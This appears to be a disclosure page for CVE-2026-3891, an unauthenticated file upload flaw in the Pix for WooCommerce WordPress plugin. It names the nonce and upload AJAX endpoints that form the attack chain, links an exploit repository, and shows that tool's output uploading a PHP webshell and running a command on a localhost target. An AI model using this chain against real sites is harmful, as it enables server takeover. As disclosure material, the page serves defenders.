CVE-2026-3891:
Pix for WooCommerce Unauthenticated File Upload
CVE-2026-3891 is an unauthenticated arbitrary file upload vulnerability in the Pix for WooCommerce WordPress plugin. The plugin exposes an AJAX endpoint (lkn_pix_for_woocommerce_c6_save_settings) that accepts certificate file uploads without any authentication. A nonce can be obtained unauthenticated via a second exposed endpoint (lkn_pix_for_woocommerce_generate_nonce), allowing a fully unauthenticated attacker to upload arbitrary files — including PHP webshells — directly to the web root.
Affected versions: payment-gateway-pix-for-woocommerce <= 1.5.0
_____ _____ ___ __ ___ __ ____ ___ ___ _ / __\ \ / / __|_|_ ) \_ )/ / __|__ /( _ ) _ \/ | | (__ \ V /| _|___/ / () / // _ \___|_ \/ _ \_, /| | \___| \_/ |___| /___\__/___\___/ |___/\___//_/ |_| https://github.com/joshuavanderpoll/CVE-2026-3891 [*] Target : http://localhost:8080 [*] Timeout : 10s [@] Fetching nonce ... [+] Nonce : 4529a50f21 [@] Uploading shell.php ... [+] Shell uploaded! [+] Remote path : wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/shell.php [+] Shell URL : http://localhost:8080/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/shell.php [@] Verifying shell is accessible ... [+] Shell is accessible! HTTP 200 [*] Dropping into interactive shell. Type exit to quit. shell> ls [@] Running: ls ──────────────────────────────────────────────────────────── shell.php ──────────────────────────────────────────────────────────── shell>
9.8
Critical risk
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Compexity
low
Privileges
none
Affected
<= 1.5.0
Patched
> 1.5.0